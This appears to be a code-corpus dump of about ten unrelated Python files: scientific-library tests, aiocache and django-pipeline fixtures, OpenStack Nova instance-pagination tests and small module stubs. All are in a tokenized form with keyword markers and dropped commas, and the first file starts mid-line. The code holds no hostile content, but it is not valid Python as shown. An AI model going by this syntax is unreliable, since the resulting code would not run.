decimal=6)<line_sep>image_ones=np.ones((6 8))<line_sep>grad=image_util.gradient_map(image_ones)<line_sep>npt.assert_almost_equal(grad image decimal=6)<assert_stmt>np.shape(grad)<eq>np.shape(image)<block_end><class_stmt>TestRaise(unittest.TestCase)<block_start><def_stmt>test_raise self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>grid2d=np.zeros((7 7))<line_sep>x_pos,y_pos=4 1<line_sep>kernel=np.ones((2 2))<line_sep>added=image_util.add_layer2image_int(grid2d x_pos y_pos kernel)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>image=np.ones((5 5))<line_sep>image_util.re_size(image factor=2)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>image=np.ones((5 5))<line_sep>image_util.re_size(image factor=0.5)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>image=np.ones((5 5))<line_sep>image_util.cut_edges(image numPix=7)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>image=np.ones((5 6))<line_sep>image_util.cut_edges(image numPix=3)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>image=np.ones((5 5))<line_sep>image_util.cut_edges(image numPix=2)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>pytest.main()<block_end>
<import_stmt>numpy<as>np<import_from_stmt>public_tool.form_index form_index<import_from_stmt>XGB_HMM.form_B_matrix_by_XGB form_B_matrix_by_XGB<import_from_stmt>XGB_HMM.predict self_pred<def_stmt>pred_proba_XGB A model pi O allow_flag lengths# 对dataset形成pred_proba,注意这里的dataset是solve_on_raw_data后的结果,即附带allow_flag的数据 # output: # pred_proba:数组类型 <block_start>n_states=len(pi)<line_sep>pred_proba=np.zeros((O.shape[0] n_states))<for_stmt>i range(len(lengths))<block_start>begin_index,end_index=form_index(lengths i)<line_sep>now_O=O[begin_index:end_index :]<line_sep>now_allow_flag=allow_flag[begin_index:end_index]<line_sep>now_pred_proba=np.zeros((now_O.shape[0] n_states))<line_sep>now_allow_B=form_B_matrix_by_XGB(model now_O[now_allow_flag<eq>1] pi)<line_sep>_,now_allow_pred_proba,_=self_pred(now_allow_B [now_allow_B.shape[0]] A pi)<line_sep>now_pred_proba[now_allow_flag<eq>1]=now_allow_pred_proba<line_sep>pred_proba[begin_index:end_index]=now_pred_proba<block_end><return>pred_proba<block_end>
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models# noqa # Create your models here.
<import_from_stmt>typing TYPE_CHECKING<if_stmt>TYPE_CHECKING# import modules that have public classes/functions <block_start><import_from_stmt>pandas.io.formats style<line_sep># and mark only those modules as public __all__=["style"]<block_end>
<import_stmt>pytest<import_stmt>asynctest<import_from_stmt>aiocache.base BaseCache API<import_from_stmt>aiocache caches RedisCache MemcachedCache<import_from_stmt>aiocache.plugins BasePlugin<import_from_stmt>aiocache.serializers BaseSerializer<def_stmt>pytest_configure <block_start>""" Before pytest_namespace was being used to set the keys for testing but the feature was removed https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace """<line_sep>pytest.KEY="key"<line_sep>pytest.KEY_1="random"<block_end>@pytest.fixture(autouse=<true>)<def_stmt>reset_caches <block_start>caches.set_config({"default":{"cache":"aiocache.SimpleMemoryCache" "serializer":{"class":"aiocache.serializers.NullSerializer"} }})<block_end><class_stmt>MockCache(BaseCache)<block_start><def_stmt>__init__ self<block_start>super().__init__()<line_sep>self._add=asynctest.CoroutineMock()<line_sep>self._get=asynctest.CoroutineMock()<line_sep>self._gets=asynctest.CoroutineMock()<line_sep>self._set=asynctest.CoroutineMock()<line_sep>self._multi_get=asynctest.CoroutineMock(return_value=["a" "b"])<line_sep>self._multi_set=asynctest.CoroutineMock()<line_sep>self._delete=asynctest.CoroutineMock()<line_sep>self._exists=asynctest.CoroutineMock()<line_sep>self._increment=asynctest.CoroutineMock()<line_sep>self._expire=asynctest.CoroutineMock()<line_sep>self._clear=asynctest.CoroutineMock()<line_sep>self._raw=asynctest.CoroutineMock()<line_sep>self._redlock_release=asynctest.CoroutineMock()<line_sep>self.acquire_conn=asynctest.CoroutineMock()<line_sep>self.release_conn=asynctest.CoroutineMock()<line_sep>self._close=asynctest.CoroutineMock()<block_end><block_end>@pytest.fixture<def_stmt>mock_cache mocker<block_start>cache=MockCache()<line_sep>cache.timeout=0.002<line_sep>mocker.spy(cache "_build_key")<for_stmt>cmd API.CMDS<block_start>mocker.spy(cache cmd.__name__)<block_end>mocker.spy(cache "close")<line_sep>cache.serializer=asynctest.Mock(spec=BaseSerializer)<line_sep>cache.serializer.encoding="utf-8"<line_sep>cache.plugins=[asynctest.Mock(spec=BasePlugin)]<line_sep><return>cache<block_end>@pytest.fixture<def_stmt>base_cache <block_start><return>BaseCache()<block_end>@pytest.fixture<def_stmt>redis_cache <block_start>cache=RedisCache()<line_sep><return>cache<block_end>@pytest.fixture<def_stmt>memcached_cache <block_start>cache=MemcachedCache()<line_sep><return>cache<block_end>
<import_from_stmt>django.contrib.staticfiles finders<import_from_stmt>django.contrib.staticfiles.storage staticfiles_storage<import_from_stmt>django.core.management call_command<import_from_stmt>django.test TestCase<import_from_stmt>django.test.utils override_settings<import_from_stmt>django.test.utils modify_settings<import_from_stmt>pipeline.collector default_collector<import_from_stmt>pipeline.storage PipelineStorage<import_from_stmt>tests.tests.test_compiler DummyCompiler<import_from_stmt>tests.utils pipeline_settings<import_from_stmt>io StringIO<class_stmt>PipelineNoPathStorage(PipelineStorage)<block_start>"""Storage without an implemented path method"""<def_stmt>path self *args<block_start><raise>NotImplementedError()<block_end><def_stmt>delete self *args<block_start><return><block_end><def_stmt>exists self *args<block_start><return><true><block_end><def_stmt>save self *args<block_start><return><block_end><def_stmt>open self *args<block_start><return>StringIO()<block_end><def_stmt>listdir self *args<block_start><return>[]<block_end><block_end><class_stmt>DummyCSSCompiler(DummyCompiler)<block_start>""" Handles css files """<line_sep>output_extension='css'<def_stmt>match_file self path<block_start><return>path.endswith('.css')<block_end><block_end><class_stmt>StorageTest(TestCase)<block_start><def_stmt>tearDown self<block_start>staticfiles_storage._setup()<block_end>@pipeline_settings(JS_COMPRESSOR=<none> CSS_COMPRESSOR=<none>)<def_stmt>test_post_process_dry_run self<block_start>default_collector.collect()<line_sep>processed_files=PipelineStorage().post_process({} <true>)<line_sep>self.assertEqual(list(processed_files) [])<block_end>@pipeline_settings(JS_COMPRESSOR=<none> CSS_COMPRESSOR=<none> COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])<def_stmt>test_post_process self<block_start>default_collector.collect()<line_sep>storage=PipelineStorage()<line_sep>processed_files=storage.post_process({})<line_sep>self.assertTrue(('screen.css' 'screen.css' <true>)<in>processed_files)<line_sep>self.assertTrue(('scripts.js' 'scripts.js' <true>)<in>processed_files)<block_end>@override_settings(STATICFILES_STORAGE='tests.tests.test_storage.PipelineNoPathStorage')@pipeline_settings(JS_COMPRESSOR=<none> CSS_COMPRESSOR=<none> COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])<def_stmt>test_post_process_no_path self<block_start>""" Test post_process with a storage that doesn't implement the path method. """<line_sep>staticfiles_storage._setup()<try_stmt><block_start>call_command('collectstatic' verbosity=0 interactive=<false>)<block_end><except_stmt>NotImplementedError<block_start>self.fail('Received an error running collectstatic')<block_end><block_end>@modify_settings(STATICFILES_FINDERS={'append':'pipeline.finders.PipelineFinder'})<def_stmt>test_nonexistent_file_pipeline_finder self<block_start>path=finders.find('nothing.css')<line_sep>self.assertIsNone(path)<block_end>@modify_settings(STATICFILES_FINDERS={'append':'pipeline.finders.CachedFileFinder'})<def_stmt>test_nonexistent_file_cached_finder self<block_start>path=finders.find('nothing.css')<line_sep>self.assertIsNone(path)<block_end>@modify_settings(STATICFILES_FINDERS={'append':'pipeline.finders.PipelineFinder'})<def_stmt>test_nonexistent_double_extension_file_pipeline_finder self<block_start>path=finders.find('app.css.map')<line_sep>self.assertIsNone(path)<block_end>@modify_settings(STATICFILES_FINDERS={'append':'pipeline.finders.CachedFileFinder'})<def_stmt>test_nonexistent_double_extension_file_cached_finder self<block_start>path=finders.find('app.css.map')<line_sep>self.assertIsNone(path)<block_end><block_end>
# coding=utf-8 # Copyright 2019 The Interval Bound Propagation Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for loss."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>interval_bound_propagation<as>ibp<import_stmt>sonnet<as>snt<import_stmt>tensorflow.compat.v1<as>tf<class_stmt>FixedNN(snt.AbstractModule)<block_start><def_stmt>_build self z0 is_training=<false><block_start>self._m=snt.Linear(2 initializers={'w':tf.constant_initializer(1.) 'b':<lambda>*unsed_args **unused_kwargs:tf.constant([0. 1.]) })<line_sep><return>self._m(z0)<block_end><block_end><class_stmt>LossTest(tf.test.TestCase)<block_start><def_stmt>testEndToEnd self<block_start>predictor=FixedNN()<line_sep>predictor=ibp.VerifiableModelWrapper(predictor)<line_sep># Labels. labels=tf.constant([1] dtype=tf.int64)<line_sep># Connect to input. z=tf.constant([[1 2 3]] dtype=tf.float32)<line_sep>predictor(z is_training=<true>)<line_sep># Input bounds. eps=1.<line_sep>input_bounds=ibp.IntervalBounds(z-eps z+eps)<line_sep>predictor.propagate_bounds(input_bounds)<line_sep># Create output specification (that forces the first logits to be greater). c=tf.constant([[[1 -1]]] dtype=tf.float32)<line_sep>d=tf.constant([[0]] dtype=tf.float32)<line_sep># Turn elision off for more interesting results. spec=ibp.LinearSpecification(c d collapse=<false>)<line_sep># Create an attack. attack=ibp.UntargetedPGDAttack(predictor spec eps num_steps=1 input_bounds=(-100. 100))<line_sep># Build loss. losses=ibp.Losses(predictor spec attack interval_bounds_loss_type='hinge' interval_bounds_hinge_margin=0.)<line_sep>losses(labels)<with_stmt>self.test_session()<as>sess<block_start>sess.run(tf.global_variables_initializer())<line_sep># We expect the worst-case logits from IBP to be [9, 4]. # The adversarial attack should fail since logits are always [l, l + 1]. # Similarly, the nominal predictions are correct. accuracy_values,loss_values=sess.run([losses.scalar_metrics losses.scalar_losses])<line_sep>self.assertAlmostEqual(1. accuracy_values.nominal_accuracy)<line_sep>self.assertAlmostEqual(0. accuracy_values.verified_accuracy)<line_sep>self.assertAlmostEqual(1. accuracy_values.attack_accuracy)<line_sep>expected_xent=0.31326168751822947<line_sep>self.assertAlmostEqual(expected_xent loss_values.nominal_cross_entropy places=5)<line_sep>self.assertAlmostEqual(expected_xent loss_values.attack_cross_entropy places=5)<line_sep>expected_hinge=5.<line_sep>self.assertAlmostEqual(expected_hinge loss_values.verified_loss)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>datetime<import_from_stmt>oslo_utils.fixture uuidsentinel<as>uuids<import_from_stmt>nova.compute instance_list<import_from_stmt>nova context<import_from_stmt>nova.db.main api<as>db<import_from_stmt>nova exception<import_from_stmt>nova objects<import_from_stmt>nova test<class_stmt>InstanceListTestCase(test.TestCase)<block_start>NUMBER_OF_CELLS=3<def_stmt>setUp self<block_start>super(InstanceListTestCase self).setUp()<line_sep>self.context=context.RequestContext('fake' 'fake')<line_sep>self.num_instances=3<line_sep>self.instances=[]<line_sep>start=datetime.datetime(1985 10 25 1 21 0)<line_sep>dt=start<line_sep>spread=datetime.timedelta(minutes=10)<line_sep>self.cells=objects.CellMappingList.get_all(self.context)<line_sep># Create three instances in each of the real cells. Leave the # first cell empty to make sure we don't break with an empty # one. <for_stmt>cell self.cells[1:]<block_start><for_stmt>i range(0 self.num_instances)<block_start><with_stmt>context.target_cell(self.context cell)<as>cctx<block_start>inst=objects.Instance(context=cctx project_id=self.context.project_id user_id=self.context.user_id created_at=start launched_at=dt instance_type_id=i hostname='%s-inst%i'%(cell.name i))<line_sep>inst.create()<if_stmt>i%2<eq>0# Make some faults for this instance <block_start><for_stmt>n range(0 i+1)<block_start>msg='fault%i-%s'%(n inst.hostname)<line_sep>f=objects.InstanceFault(context=cctx instance_uuid=inst.uuid code=i message=msg details='fake' host='fakehost')<line_sep>f.create()<block_end><block_end><block_end>self.instances.append(inst)<line_sep>im=objects.InstanceMapping(context=self.context project_id=inst.project_id user_id=inst.user_id instance_uuid=inst.uuid cell_mapping=cell)<line_sep>im.create()<line_sep>dt<augadd>spread<block_end><block_end><block_end><def_stmt>test_get_sorted self<block_start>filters={}<line_sep>limit=<none><line_sep>marker=<none><line_sep>columns=[]<line_sep>sort_keys=['uuid']<line_sep>sort_dirs=['asc']<line_sep>obj,insts=instance_list.get_instances_sorted(self.context filters limit marker columns sort_keys sort_dirs)<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>self.assertEqual(sorted(uuids) uuids)<line_sep>self.assertEqual(len(self.instances) len(uuids))<block_end><def_stmt>test_get_sorted_descending self<block_start>filters={}<line_sep>limit=<none><line_sep>marker=<none><line_sep>columns=[]<line_sep>sort_keys=['uuid']<line_sep>sort_dirs=['desc']<line_sep>obj,insts=instance_list.get_instances_sorted(self.context filters limit marker columns sort_keys sort_dirs)<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>self.assertEqual(list(reversed(sorted(uuids))) uuids)<line_sep>self.assertEqual(len(self.instances) len(uuids))<block_end><def_stmt>test_get_sorted_with_filter self<block_start>filters={'instance_type_id':1}<line_sep>limit=<none><line_sep>marker=<none><line_sep>columns=[]<line_sep>sort_keys=['uuid']<line_sep>sort_dirs=['asc']<line_sep>obj,insts=instance_list.get_instances_sorted(self.context filters limit marker columns sort_keys sort_dirs)<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>expected=[inst['uuid']<for>inst self.instances<if>inst['instance_type_id']<eq>1]<line_sep>self.assertEqual(list(sorted(expected)) uuids)<block_end><def_stmt>test_get_sorted_by_defaults self<block_start>filters={}<line_sep>limit=<none><line_sep>marker=<none><line_sep>columns=[]<line_sep>sort_keys=<none><line_sep>sort_dirs=<none><line_sep>obj,insts=instance_list.get_instances_sorted(self.context filters limit marker columns sort_keys sort_dirs)<line_sep>uuids=set([inst['uuid']<for>inst insts])<line_sep>expected=set([inst['uuid']<for>inst self.instances])<line_sep>self.assertEqual(expected uuids)<block_end><def_stmt>test_get_sorted_with_limit self<block_start>obj,insts=instance_list.get_instances_sorted(self.context {} 5 <none> [] ['uuid'] ['asc'])<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>had_uuids=[inst.uuid<for>inst self.instances]<line_sep>self.assertEqual(sorted(had_uuids)[:5] uuids)<line_sep>self.assertEqual(5 len(uuids))<block_end><def_stmt>test_get_sorted_with_large_limit self<block_start>obj,insts=instance_list.get_instances_sorted(self.context {} 5000 <none> [] ['uuid'] ['asc'])<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>self.assertEqual(sorted(uuids) uuids)<line_sep>self.assertEqual(len(self.instances) len(uuids))<block_end><def_stmt>test_get_sorted_with_large_limit_batched self<block_start>obj,insts=instance_list.get_instances_sorted(self.context {} 5000 <none> [] ['uuid'] ['asc'] batch_size=2)<line_sep>uuids=[inst['uuid']<for>inst insts]<line_sep>self.assertEqual(sorted(uuids) uuids)<line_sep>self.assertEqual(len(self.instances) len(uuids))<block_end><def_stmt>_test_get_sorted_with_limit_marker self sort_by pages=2 pagesize=2 sort_dir='asc'<block_start>"""Get multiple pages by a sort key and validate the results. This requests $pages of $pagesize, followed by a final page with no limit, and a final-final page which should be empty. It validates that we got a consistent set of results no patter where the page boundary is, that we got all the results after the unlimited query, and that the final page comes back empty when we use the last instance as a marker. """<line_sep>insts=[]<line_sep>page=0<while_stmt><true><block_start><if_stmt>page<ge>pages# We've requested the specified number of limited (by pagesize) # pages, so request a penultimate page with no limit which # should always finish out the result. <block_start>limit=<none><block_end><else_stmt># Request a limited-size page for the first $pages pages. <block_start>limit=pagesize<block_end><if_stmt>insts# If we're not on the first page, use the last instance we # received as the marker <block_start>marker=insts[-1]['uuid']<block_end><else_stmt># No marker for the first page <block_start>marker=<none><block_end>batch=list(instance_list.get_instances_sorted(self.context {} limit marker [] [sort_by] [sort_dir])[1])<if_stmt><not>batch# This should only happen when we've pulled the last empty # page because we used the marker of the last instance. If # we end up with a non-deterministic ordering, we'd loop # forever. <block_start><break><block_end>insts.extend(batch)<line_sep>page<augadd>1<if_stmt>page<g>len(self.instances)<times>2# Do this sanity check in case we introduce (or find) another # repeating page bug like #1721791. Without this we loop # until timeout, which is less obvious. <block_start><raise>Exception('Infinite paging loop')<block_end><block_end># We should have requested exactly (or one more unlimited) pages self.assertIn(page (pages pages+1))<line_sep># Make sure the full set matches what we know to be true found=[x[sort_by]<for>x insts]<line_sep>had=[x[sort_by]<for>x self.instances]<if_stmt>sort_by<in>('launched_at' 'created_at')# We're comparing objects and database entries, so we need to # squash the tzinfo of the object ones so we can compare <block_start>had=[x.replace(tzinfo=<none>)<for>x had]<block_end>self.assertEqual(len(had) len(found))<if_stmt>sort_dir<eq>'asc'<block_start>self.assertEqual(sorted(had) found)<block_end><else_stmt><block_start>self.assertEqual(list(reversed(sorted(had))) found)<block_end><block_end><def_stmt>test_get_sorted_with_limit_marker_stable self<block_start>"""Test sorted by hostname. This will be a stable sort that won't change on each run. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='hostname')<block_end><def_stmt>test_get_sorted_with_limit_marker_stable_reverse self<block_start>"""Test sorted by hostname. This will be a stable sort that won't change on each run. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='hostname' sort_dir='desc')<block_end><def_stmt>test_get_sorted_with_limit_marker_stable_different_pages self<block_start>"""Test sorted by hostname with different page sizes. Just do the above with page seams in different places. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='hostname' pages=3 pagesize=1)<block_end><def_stmt>test_get_sorted_with_limit_marker_stable_different_pages_reverse self<block_start>"""Test sorted by hostname with different page sizes. Just do the above with page seams in different places. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='hostname' pages=3 pagesize=1 sort_dir='desc')<block_end><def_stmt>test_get_sorted_with_limit_marker_random self<block_start>"""Test sorted by uuid. This will not be stable and the actual ordering will depend on uuid generation and thus be different on each run. Do this in addition to the stable sort above to keep us honest. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='uuid')<block_end><def_stmt>test_get_sorted_with_limit_marker_random_different_pages self<block_start>"""Test sorted by uuid with different page sizes. Just do the above with page seams in different places. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='uuid' pages=3 pagesize=2)<block_end><def_stmt>test_get_sorted_with_limit_marker_datetime self<block_start>"""Test sorted by launched_at. This tests that we can do all of this, but with datetime fields. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='launched_at')<block_end><def_stmt>test_get_sorted_with_limit_marker_datetime_same self<block_start>"""Test sorted by created_at. This tests that we can do all of this, but with datetime fields that are identical. """<line_sep>self._test_get_sorted_with_limit_marker(sort_by='created_at')<block_end><def_stmt>test_get_sorted_with_deleted_marker self<block_start>marker=self.instances[1]['uuid']<line_sep>before=list(instance_list.get_instances_sorted(self.context {} <none> marker [] <none> <none>)[1])<line_sep>db.instance_destroy(self.context marker)<line_sep>after=list(instance_list.get_instances_sorted(self.context {} <none> marker [] <none> <none>)[1])<line_sep>self.assertEqual(before after)<block_end><def_stmt>test_get_sorted_with_invalid_marker self<block_start>self.assertRaises(exception.MarkerNotFound list instance_list.get_instances_sorted(self.context {} <none> 'not-a-marker' [] <none> <none>)[1])<block_end><def_stmt>test_get_sorted_with_purged_instance self<block_start>"""Test that we handle a mapped but purged instance."""<line_sep>im=objects.InstanceMapping(self.context instance_uuid=uuids.missing project_id=self.context.project_id user_id=self.context.user_id cell=self.cells[0])<line_sep>im.create()<line_sep>self.assertRaises(exception.MarkerNotFound list instance_list.get_instances_sorted(self.context {} <none> uuids.missing [] <none> <none>)[1])<block_end><def_stmt>_test_get_paginated_with_filter self filters<block_start>found_uuids=[]<line_sep>marker=<none><while_stmt><true># Query for those instances, sorted by a different key in # pages of one until we've consumed them all <block_start>batch=list(instance_list.get_instances_sorted(self.context filters 1 marker [] ['hostname'] ['asc'])[1])<if_stmt><not>batch<block_start><break><block_end>found_uuids.extend([x['uuid']<for>x batch])<line_sep>marker=found_uuids[-1]<block_end><return>found_uuids<block_end><def_stmt>test_get_paginated_with_uuid_filter self<block_start>"""Test getting pages with uuid filters. This runs through the results of a uuid-filtered query in pages of length one to ensure that we land on markers that are filtered out of the query and are not accidentally returned. """<line_sep># Pick a set of the instances by uuid, when sorted by uuid all_uuids=[x['uuid']<for>x self.instances]<line_sep>filters={'uuid':sorted(all_uuids)[:7]}<line_sep>found_uuids=self._test_get_paginated_with_filter(filters)<line_sep># Make sure we found all (and only) the instances we asked for self.assertEqual(set(found_uuids) set(filters['uuid']))<line_sep>self.assertEqual(7 len(found_uuids))<block_end><def_stmt>test_get_paginated_with_other_filter self<block_start>"""Test getting pages with another filter. This runs through the results of a filtered query in pages of length one to ensure we land on markers that are filtered out of the query and are not accidentally returned. """<line_sep>expected=[inst['uuid']<for>inst self.instances<if>inst['instance_type_id']<eq>1]<line_sep>filters={'instance_type_id':1}<line_sep>found_uuids=self._test_get_paginated_with_filter(filters)<line_sep>self.assertEqual(set(expected) set(found_uuids))<block_end><def_stmt>test_get_paginated_with_uuid_and_other_filter self<block_start>"""Test getting pages with a uuid and other type of filter. We do this to make sure that we still find (but exclude) the marker even if one of the other filters would have included it. """<line_sep># Pick a set of the instances by uuid, when sorted by uuid all_uuids=[x['uuid']<for>x self.instances]<line_sep>filters={'uuid':sorted(all_uuids)[:7] 'user_id':'fake'}<line_sep>found_uuids=self._test_get_paginated_with_filter(filters)<line_sep># Make sure we found all (and only) the instances we asked for self.assertEqual(set(found_uuids) set(filters['uuid']))<line_sep>self.assertEqual(7 len(found_uuids))<block_end><def_stmt>test_get_sorted_with_faults self<block_start>"""Make sure we get faults when we ask for them."""<line_sep>insts=list(instance_list.get_instances_sorted(self.context {} <none> <none> ['fault'] ['hostname'] ['asc'])[1])<line_sep># Two of the instances in each cell have faults (0th and 2nd) expected_faults=self.NUMBER_OF_CELLS<times>2<line_sep>expected_no_fault=len(self.instances)-expected_faults<line_sep>faults=[inst['fault']<for>inst insts]<line_sep>self.assertEqual(expected_no_fault faults.count(<none>))<block_end><def_stmt>test_get_sorted_paginated_with_faults self<block_start>"""Get pages of one with faults. Do this specifically so we make sure we land on faulted marker instances to ensure we don't omit theirs. """<line_sep>insts=[]<while_stmt><true><block_start><if_stmt>insts<block_start>marker=insts[-1]['uuid']<block_end><else_stmt><block_start>marker=<none><block_end>batch=list(instance_list.get_instances_sorted(self.context {} 1 marker ['fault'] ['hostname'] ['asc'])[1])<if_stmt><not>batch<block_start><break><block_end>insts.extend(batch)<block_end>self.assertEqual(len(self.instances) len(insts))<line_sep># Two of the instances in each cell have faults (0th and 2nd) expected_faults=self.NUMBER_OF_CELLS<times>2<line_sep>expected_no_fault=len(self.instances)-expected_faults<line_sep>faults=[inst['fault']<for>inst insts]<line_sep>self.assertEqual(expected_no_fault faults.count(<none>))<block_end><def_stmt>test_instance_list_minimal_cells self<block_start>"""Get a list of instances with a subset of cell mappings."""<line_sep>last_cell=self.cells[-1]<with_stmt>context.target_cell(self.context last_cell)<as>cctxt<block_start>last_cell_instances=db.instance_get_all(cctxt)<line_sep>last_cell_uuids=[inst['uuid']<for>inst last_cell_instances]<block_end>instances=list(instance_list.get_instances_sorted(self.context {} <none> <none> [] ['uuid'] ['asc'] cell_mappings=self.cells[:-1])[1])<line_sep>found_uuids=[inst['hostname']<for>inst instances]<line_sep>had_uuids=[inst['hostname']<for>inst self.instances<if>inst['uuid']<not><in>last_cell_uuids]<line_sep>self.assertEqual(sorted(had_uuids) sorted(found_uuids))<block_end><block_end><class_stmt>TestInstanceListObjects(test.TestCase)<block_start><def_stmt>setUp self<block_start>super(TestInstanceListObjects self).setUp()<line_sep>self.context=context.RequestContext('fake' 'fake')<line_sep>self.num_instances=3<line_sep>self.instances=[]<line_sep>start=datetime.datetime(1985 10 25 1 21 0)<line_sep>dt=start<line_sep>spread=datetime.timedelta(minutes=10)<line_sep>cells=objects.CellMappingList.get_all(self.context)<line_sep># Create three instances in each of the real cells. Leave the # first cell empty to make sure we don't break with an empty # one <for_stmt>cell cells[1:]<block_start><for_stmt>i range(0 self.num_instances)<block_start><with_stmt>context.target_cell(self.context cell)<as>cctx<block_start>inst=objects.Instance(context=cctx project_id=self.context.project_id user_id=self.context.user_id created_at=start launched_at=dt instance_type_id=i hostname='%s-inst%i'%(cell.name i))<line_sep>inst.create()<if_stmt>i%2<eq>0# Make some faults for this instance <block_start><for_stmt>n range(0 i+1)<block_start>msg='fault%i-%s'%(n inst.hostname)<line_sep>f=objects.InstanceFault(context=cctx instance_uuid=inst.uuid code=i message=msg details='fake' host='fakehost')<line_sep>f.create()<block_end><block_end><block_end>self.instances.append(inst)<line_sep>im=objects.InstanceMapping(context=self.context project_id=inst.project_id user_id=inst.user_id instance_uuid=inst.uuid cell_mapping=cell)<line_sep>im.create()<line_sep>dt<augadd>spread<block_end><block_end><block_end><def_stmt>test_get_instance_objects_sorted self<block_start>filters={}<line_sep>limit=<none><line_sep>marker=<none><line_sep>expected_attrs=[]<line_sep>sort_keys=['uuid']<line_sep>sort_dirs=['asc']<line_sep>insts,down_cell_uuids=instance_list.get_instance_objects_sorted(self.context filters limit marker expected_attrs sort_keys sort_dirs)<line_sep>found_uuids=[x.uuid<for>x insts]<line_sep>had_uuids=sorted([x['uuid']<for>x self.instances])<line_sep>self.assertEqual(had_uuids found_uuids)<line_sep># Make sure none of the instances have fault set self.assertEqual(0 len([inst<for>inst insts<if>'fault'<in>inst]))<block_end><def_stmt>test_get_instance_objects_sorted_with_fault self<block_start>filters={}<line_sep>limit=<none><line_sep>marker=<none><line_sep>expected_attrs=['fault']<line_sep>sort_keys=['uuid']<line_sep>sort_dirs=['asc']<line_sep>insts,down_cell_uuids=instance_list.get_instance_objects_sorted(self.context filters limit marker expected_attrs sort_keys sort_dirs)<line_sep>found_uuids=[x.uuid<for>x insts]<line_sep>had_uuids=sorted([x['uuid']<for>x self.instances])<line_sep>self.assertEqual(had_uuids found_uuids)<line_sep># They should all have fault set, but only some have # actual faults self.assertEqual(2 len([inst<for>inst insts<if>inst.fault]))<block_end><def_stmt>test_get_instance_objects_sorted_paged self<block_start>"""Query a full first page and ensure an empty second one. This uses created_at which is enforced to be the same across each instance by setUp(). This will help make sure we still have a stable ordering, even when we only claim to care about created_at. """<line_sep>instp1,down_cell_uuids=instance_list.get_instance_objects_sorted(self.context {} <none> <none> [] ['created_at'] ['asc'])<line_sep>self.assertEqual(len(self.instances) len(instp1))<line_sep>instp2,down_cell_uuids=instance_list.get_instance_objects_sorted(self.context {} <none> instp1[-1]['uuid'] [] ['created_at'] ['asc'])<line_sep>self.assertEqual(0 len(instp2))<block_end><block_end>
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_from_stmt>backend.container_service.clusters.base.models CtxCluster<import_from_stmt>backend.resources.constants DEFAULT_CRON_JOB_API_VERSION K8sResourceKind<import_from_stmt>backend.resources.resource ResourceClient<import_from_stmt>backend.resources.workloads.cronjob.formatter CronJobFormatter<class_stmt>CronJob(ResourceClient)<block_start>kind=K8sResourceKind.CronJob.value<line_sep>formatter=CronJobFormatter()<def_stmt>__init__ self ctx_cluster:CtxCluster<block_start>super().__init__(ctx_cluster=ctx_cluster api_version=DEFAULT_CRON_JOB_API_VERSION)<block_end><block_end>
# coding=utf-8 # Copyright 2021 The Trax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests different ways to use the public tf-numpy module."""<import_stmt>numpy<as>onp<import_stmt>tensorflow<as>tf<import_stmt>tensorflow.experimental.numpy<as>np1<import_from_stmt>tensorflow.experimental numpy<as>np2# pylint: disable=reimported np3=tf.experimental.numpy<class_stmt>PublicSymbolTest(tf.test.TestCase)<block_start><def_stmt>testSimple self<block_start>a=0.1<line_sep>b=0.2<for_stmt>op [np1.add np2.add np3.add]<block_start>self.assertAllClose(onp.add(a b) op(a b))<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>tf.compat.v1.enable_eager_execution()<line_sep>tf.test.main()<block_end>
